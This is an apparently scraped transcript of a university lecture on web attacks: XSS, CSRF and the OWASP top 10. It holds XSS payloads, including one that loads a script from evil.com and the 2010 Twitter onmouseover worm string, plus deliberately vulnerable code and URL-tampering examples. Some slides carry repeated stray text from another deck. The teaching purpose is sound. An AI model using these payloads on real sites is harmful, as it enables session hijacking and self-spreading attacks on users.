attacks against websites 2 - university of birmingham · introduction •more on web attacks:...
TRANSCRIPT
![Page 1: Attacks Against Websites 2 - University of Birmingham · Introduction •More on Web Attacks: –Cross site scripting attacks (XSS) –Cross-site request forgery (CSRF) •OWASP top](https://reader030.vdocument.in/reader030/viewer/2022041211/5dd0f855d6be591ccb639619/html5/thumbnails/1.jpg)
Attacks Against Websites 2
Tom ChothiaComputer Security, Lecture 12
![Page 2: Attacks Against Websites 2 - University of Birmingham · Introduction •More on Web Attacks: –Cross site scripting attacks (XSS) –Cross-site request forgery (CSRF) •OWASP top](https://reader030.vdocument.in/reader030/viewer/2022041211/5dd0f855d6be591ccb639619/html5/thumbnails/2.jpg)
Introduction
• More on Web Attacks:– Cross site scripting attacks (XSS)– Cross-site request forgery (CSRF)
• OWASP top 10 web attacks.
![Page 3: Attacks Against Websites 2 - University of Birmingham · Introduction •More on Web Attacks: –Cross site scripting attacks (XSS) –Cross-site request forgery (CSRF) •OWASP top](https://reader030.vdocument.in/reader030/viewer/2022041211/5dd0f855d6be591ccb639619/html5/thumbnails/3.jpg)
Cross-site scripting (XSS)
• An input validation vulnerability.
• Allows an attacker to inject client-sidecode (JavaScript) into web pages.
• This is then served by a vulnerable webapplication to other users.
![Page 4: Attacks Against Websites 2 - University of Birmingham · Introduction •More on Web Attacks: –Cross site scripting attacks (XSS) –Cross-site request forgery (CSRF) •OWASP top](https://reader030.vdocument.in/reader030/viewer/2022041211/5dd0f855d6be591ccb639619/html5/thumbnails/4.jpg)
Reflected XSS• The injected code is
reflected off the webserver– an error message,– search result,– response includes
some/all of the inputsent to the server aspart of the request
• Only the user issuingthe malicious requestis affected
String searchQuery =
request.getParameter(“searchQuery”);…PrintWriter out = response.getWriter();out.println(“<h1>” + “Results for “ + searchQuery + “</h1>”);
User request:searchQuery=<script>alert(“pwnd”)</script>
![Page 5: Attacks Against Websites 2 - University of Birmingham · Introduction •More on Web Attacks: –Cross site scripting attacks (XSS) –Cross-site request forgery (CSRF) •OWASP top](https://reader030.vdocument.in/reader030/viewer/2022041211/5dd0f855d6be591ccb639619/html5/thumbnails/5.jpg)
Stored XSS
• The injected code isstored on the website and served to itsvisitors on all pageviews– User messages– User profiles
• All users affected
String postMsg = db.getPostMsg(0);…PrintWriter out = response.getWriter();out.println(“<p>” + postMsg);
postMsg:<script>alert(“pwnd”)</script>
![Page 6: Attacks Against Websites 2 - University of Birmingham · Introduction •More on Web Attacks: –Cross site scripting attacks (XSS) –Cross-site request forgery (CSRF) •OWASP top](https://reader030.vdocument.in/reader030/viewer/2022041211/5dd0f855d6be591ccb639619/html5/thumbnails/6.jpg)
Solution for injection:sanitization
• Sanitize all user inputs is difficult• Sanitization is context-dependent
– JavaScript <script>user input</script>– CSS value a:hover {color: user input }– URL value <a href=“user input”>
• Sanitization is attack-dependent, e.g.– JavaScript– SQL
• Blacklisting vs. whitelisting• Roll-your-own vs. reuse
![Page 7: Attacks Against Websites 2 - University of Birmingham · Introduction •More on Web Attacks: –Cross site scripting attacks (XSS) –Cross-site request forgery (CSRF) •OWASP top](https://reader030.vdocument.in/reader030/viewer/2022041211/5dd0f855d6be591ccb639619/html5/thumbnails/7.jpg)
7
Spot the problem (1)
• Problem: in a character class, ‘.-@’ means“all characters included between ‘.’ and ‘@’”!
• Attack string:<script src=http://evil.com/attack.js/>
• Regular expressions can be tricky
$www_clean = ereg_replace( “[^A-Za-z0-9 .-@://]”, “”, $www);echo $www_clean;
![Page 8: Attacks Against Websites 2 - University of Birmingham · Introduction •More on Web Attacks: –Cross site scripting attacks (XSS) –Cross-site request forgery (CSRF) •OWASP top](https://reader030.vdocument.in/reader030/viewer/2022041211/5dd0f855d6be591ccb639619/html5/thumbnails/8.jpg)
8
Spot the problem (2)
• Problem: over-restrictive sanitization: browsersaccept malformed input!
• Attack string: <script>malicious code<
• Implementation != Standard
$clean =preg_replace(“#<script(.*?)>(.*?)</script(.*?)>#i”, “SCRIPT BLOCKED”, $value);echo $clean;
![Page 9: Attacks Against Websites 2 - University of Birmingham · Introduction •More on Web Attacks: –Cross site scripting attacks (XSS) –Cross-site request forgery (CSRF) •OWASP top](https://reader030.vdocument.in/reader030/viewer/2022041211/5dd0f855d6be591ccb639619/html5/thumbnails/9.jpg)
Spot the problem (3)Real Twitter bug
On Twitter if user posts www.site.com, twitter displays:<a href=“www.site.com”>www.site.com</a>
Twitter’s old sanitization algorithm blocked <script>but allowed “.
What happens if somebody tweets:http://t.co/@"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')”/
Twitter displays:<a href="http://t.co@"onmouseover=”$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"/">…</a>
![Page 10: Attacks Against Websites 2 - University of Birmingham · Introduction •More on Web Attacks: –Cross site scripting attacks (XSS) –Cross-site request forgery (CSRF) •OWASP top](https://reader030.vdocument.in/reader030/viewer/2022041211/5dd0f855d6be591ccb639619/html5/thumbnails/10.jpg)
Real-world XSS: From bug toworm
• Anyone putting mouse over such a twitterfeed will will run JavaScript that puts a similarmessage in their own feed.
• The actual attack used:
http://t.co/@"style="font-size:999999999999px;"onmouseover=”…/
– Why the style part?
![Page 11: Attacks Against Websites 2 - University of Birmingham · Introduction •More on Web Attacks: –Cross site scripting attacks (XSS) –Cross-site request forgery (CSRF) •OWASP top](https://reader030.vdocument.in/reader030/viewer/2022041211/5dd0f855d6be591ccb639619/html5/thumbnails/11.jpg)
Real-world XSS: aftermath
Image courtesy of http://nakedsecurity.sophos.com/2010/09/21/twitter-onmouseover-security-flaw-widely-exploited/
![Page 12: Attacks Against Websites 2 - University of Birmingham · Introduction •More on Web Attacks: –Cross site scripting attacks (XSS) –Cross-site request forgery (CSRF) •OWASP top](https://reader030.vdocument.in/reader030/viewer/2022041211/5dd0f855d6be591ccb639619/html5/thumbnails/12.jpg)
PHP HTML Sanitization
Htmlspecialchars() removescharactors that might cause problems inHTML:
& becomes &< becomes <> becomes >‘ becomes "“ becomes '
![Page 13: Attacks Against Websites 2 - University of Birmingham · Introduction •More on Web Attacks: –Cross site scripting attacks (XSS) –Cross-site request forgery (CSRF) •OWASP top](https://reader030.vdocument.in/reader030/viewer/2022041211/5dd0f855d6be591ccb639619/html5/thumbnails/13.jpg)
Cross-site request forgery(CSRF)
1. Victim is logged into vulnerable web site2. Victim visits malicious page on attacker web site3. Malicious content is delivered to victim4. Victim involuntarily sends a request to the vulnerable
web site
Web ApplicationAnomaly Detection
W. Robertson
Introduction
Motivation
W eb Securit y
Vulnerabi litie s
Mitigation
IntrusionDetection
Foundations
Misuse
Anomal y
Evaluation
Attacks
Bi bliography
Research
Overview
Model s
Proposed
Conclusion
Cross-site scripting (XSS)
Victim client
Vulnerable web server
Attacker web server
1. Attacker injectsmaliciouscode intovulnerablewebserver
2. Victimvisitsvulnerablewebserver
3. Maliciouscodecontained in requestis servedtovictimby webserver
4. Maliciousscriptexecutesonclientwithserverprivileges
Web ApplicationAnomaly Detection
W. Robertson
Introduction
Motivation
W eb Securit y
Vulnerabi litie s
Mitigation
IntrusionDetection
Foundations
Misuse
Anomal y
Evaluation
Attacks
Bi bliography
Research
Overview
Model s
Proposed
Conclusion
Cross-site scripting (XSS)
Victim client
Vulnerable web server
Attacker web server
1. Attacker injectsmaliciouscodeintovulnerablewebserver
2. Victimvisitsvulnerablewebserver
3. Maliciouscodecontained in requestis servedtovictimby webserver
4. Maliciousscriptexecutesonclientwith serverprivileges
Web ApplicationAnomaly Detection
W. Robertson
IntroductionMotivation
W eb Securit y
Vulnerabi litie s
Mitigation
IntrusionDetection
Foundations
Misuse
Anomal y
Evaluation
Attacks
Bi bliography
Research
Overview
Model s
Proposed
Conclusion
Cross-site scripting (XSS)
Victim client
Vulnerable web server
Attacker web server
1. Attacker injectsmaliciouscodeintovulnerablewebserver
2. Victimvisitsvulnerablewebserver
3. Maliciouscodecontained in requestis servedtovictimby webserver
4. Maliciousscriptexecutesonclientwithserverprivileges
GET /action=deleteCookie: s=01a4b8
![Page 14: Attacks Against Websites 2 - University of Birmingham · Introduction •More on Web Attacks: –Cross site scripting attacks (XSS) –Cross-site request forgery (CSRF) •OWASP top](https://reader030.vdocument.in/reader030/viewer/2022041211/5dd0f855d6be591ccb639619/html5/thumbnails/14.jpg)
Solutions to CSRF (1)
• Check the value of the Referer header
• Attacker cannot spoof the value of theReferer header in the users browser(but the user can).
• Legitimate requests may be stripped oftheir Referer header– Proxies– Web application firewalls
![Page 15: Attacks Against Websites 2 - University of Birmingham · Introduction •More on Web Attacks: –Cross site scripting attacks (XSS) –Cross-site request forgery (CSRF) •OWASP top](https://reader030.vdocument.in/reader030/viewer/2022041211/5dd0f855d6be591ccb639619/html5/thumbnails/15.jpg)
Solutions to CSRF (2)
• Every time a form is served, add anadditional parameter with a secret value(token) and check that it is valid uponsubmission
<form> <input …> <input name=“anticsrf” type=“hidden” value=“asdje8121asd26n1”</form>
![Page 16: Attacks Against Websites 2 - University of Birmingham · Introduction •More on Web Attacks: –Cross site scripting attacks (XSS) –Cross-site request forgery (CSRF) •OWASP top](https://reader030.vdocument.in/reader030/viewer/2022041211/5dd0f855d6be591ccb639619/html5/thumbnails/16.jpg)
Solutions to CSRF (2)
• Every time a form is served, add anadditional parameter with a secret value(token) and check that it is valid uponsubmission
• If the attacker can guess the tokenvalue, then no protection
![Page 17: Attacks Against Websites 2 - University of Birmingham · Introduction •More on Web Attacks: –Cross site scripting attacks (XSS) –Cross-site request forgery (CSRF) •OWASP top](https://reader030.vdocument.in/reader030/viewer/2022041211/5dd0f855d6be591ccb639619/html5/thumbnails/17.jpg)
Solutions to CSRF (3)
• Every time a form is served, add anadditional parameter with a secret value(token) and check that it is valid uponsubmission.
• If the token is not regenerated eachtime a form is served, the applicationmay be vulnerable to replay attacks(nonce).
![Page 18: Attacks Against Websites 2 - University of Birmingham · Introduction •More on Web Attacks: –Cross site scripting attacks (XSS) –Cross-site request forgery (CSRF) •OWASP top](https://reader030.vdocument.in/reader030/viewer/2022041211/5dd0f855d6be591ccb639619/html5/thumbnails/18.jpg)
OWASP top 10.
The Open Web Application SecurityProject
Open public effort to improve web security:– Many useful documents.– Open public meetings & events.
Their “10 top” lists the current biggest webthreats.
![Page 19: Attacks Against Websites 2 - University of Birmingham · Introduction •More on Web Attacks: –Cross site scripting attacks (XSS) –Cross-site request forgery (CSRF) •OWASP top](https://reader030.vdocument.in/reader030/viewer/2022041211/5dd0f855d6be591ccb639619/html5/thumbnails/19.jpg)
A1: Injection
• Server side command injection, e.g.,SQL injection.
• Not just SQL injection, any commandlanguage can be injected.
• E.g. PHP, shell commands, XML processing commands, …
![Page 20: Attacks Against Websites 2 - University of Birmingham · Introduction •More on Web Attacks: –Cross site scripting attacks (XSS) –Cross-site request forgery (CSRF) •OWASP top](https://reader030.vdocument.in/reader030/viewer/2022041211/5dd0f855d6be591ccb639619/html5/thumbnails/20.jpg)
A2: Broken Auth.
Many web developers implement theirown log in systems. Often broken, e.g.
• No session time outs.
•Passwords not hashed– E.g. password shame list.
![Page 21: Attacks Against Websites 2 - University of Birmingham · Introduction •More on Web Attacks: –Cross site scripting attacks (XSS) –Cross-site request forgery (CSRF) •OWASP top](https://reader030.vdocument.in/reader030/viewer/2022041211/5dd0f855d6be591ccb639619/html5/thumbnails/21.jpg)
A3: XXS
• Cross Side Scripting attacks, asdiscussed.
• A1 injection is command injection onthe server side.
• This is JavaScript injection on the clientside.
![Page 22: Attacks Against Websites 2 - University of Birmingham · Introduction •More on Web Attacks: –Cross site scripting attacks (XSS) –Cross-site request forgery (CSRF) •OWASP top](https://reader030.vdocument.in/reader030/viewer/2022041211/5dd0f855d6be591ccb639619/html5/thumbnails/22.jpg)
A4: Insecure Direct ObjectReference
Problem: the server trusts the client torequest only the resources it should. E.g.
http://site.com/view?user=alice
which we could replace with:
http://site.com/view?user=bob
Also common with cookie values.
![Page 23: Attacks Against Websites 2 - University of Birmingham · Introduction •More on Web Attacks: –Cross site scripting attacks (XSS) –Cross-site request forgery (CSRF) •OWASP top](https://reader030.vdocument.in/reader030/viewer/2022041211/5dd0f855d6be591ccb639619/html5/thumbnails/23.jpg)
A5: Security Misconfiguration
Make sure your security settings don’tgive an attacker an advantage, e.g.
– Error Messages: should not be madepublic.
– Directory Listings: It should not be possibleto see the files in a directory.
– Admin panels should not be publicallyaccessible.
![Page 24: Attacks Against Websites 2 - University of Birmingham · Introduction •More on Web Attacks: –Cross site scripting attacks (XSS) –Cross-site request forgery (CSRF) •OWASP top](https://reader030.vdocument.in/reader030/viewer/2022041211/5dd0f855d6be591ccb639619/html5/thumbnails/24.jpg)
A6: Sensitive Data Exposure
All sensitive data should be protected atall times.
•Is SSL used everywhere?
•Credit card numbers not encrypted:– CC no. should be encrypted in database.
PHP page should decrypt these, if needed.– This means that the hacker needs to attack
the page and the database.
![Page 25: Attacks Against Websites 2 - University of Birmingham · Introduction •More on Web Attacks: –Cross site scripting attacks (XSS) –Cross-site request forgery (CSRF) •OWASP top](https://reader030.vdocument.in/reader030/viewer/2022041211/5dd0f855d6be591ccb639619/html5/thumbnails/25.jpg)
A7: Missing Function LevelAccess Control
Query strings are used to tell dynamic webpageswhat to do
http://myWebShop.com/index.php?account=tpc&action=add
http://myWebShop.com/index.php?account=tpc&action=show
What if the attacker tries:http://myWebShop.com/index.php?
account=admin&action=delete
![Page 26: Attacks Against Websites 2 - University of Birmingham · Introduction •More on Web Attacks: –Cross site scripting attacks (XSS) –Cross-site request forgery (CSRF) •OWASP top](https://reader030.vdocument.in/reader030/viewer/2022041211/5dd0f855d6be591ccb639619/html5/thumbnails/26.jpg)
A8: CSRF
• Cross-Site Request Forgery (CSRF)
• As discussed earlier.
• Defend against by using unique token inthe hidden field of important forms.
![Page 27: Attacks Against Websites 2 - University of Birmingham · Introduction •More on Web Attacks: –Cross site scripting attacks (XSS) –Cross-site request forgery (CSRF) •OWASP top](https://reader030.vdocument.in/reader030/viewer/2022041211/5dd0f855d6be591ccb639619/html5/thumbnails/27.jpg)
A9: Using Components withKnown Vulnerabilities
• If a new security patch comes outhas it been applied?–A patch might require you to bring
down the site and so lose money.–Or it might even break your website.
• Is it worth applying the patch?
![Page 28: Attacks Against Websites 2 - University of Birmingham · Introduction •More on Web Attacks: –Cross site scripting attacks (XSS) –Cross-site request forgery (CSRF) •OWASP top](https://reader030.vdocument.in/reader030/viewer/2022041211/5dd0f855d6be591ccb639619/html5/thumbnails/28.jpg)
A10: Invalidated Redirectsand Forwards
• If attackers can forward a user toanother page then they can use it for:
– Phishing (e.g. a fake log in page)– Ad Fraud.– Launch exploits on browser.
• Not a major threat (IMHO).
![Page 29: Attacks Against Websites 2 - University of Birmingham · Introduction •More on Web Attacks: –Cross site scripting attacks (XSS) –Cross-site request forgery (CSRF) •OWASP top](https://reader030.vdocument.in/reader030/viewer/2022041211/5dd0f855d6be591ccb639619/html5/thumbnails/29.jpg)
Conclusion
• To secure a website you need to knowhow it works:– How clients request resources.– How clients are authenticated.– How HTTP and webservers work.
• Errors are often down to bad app logic
• Always sanitize everything.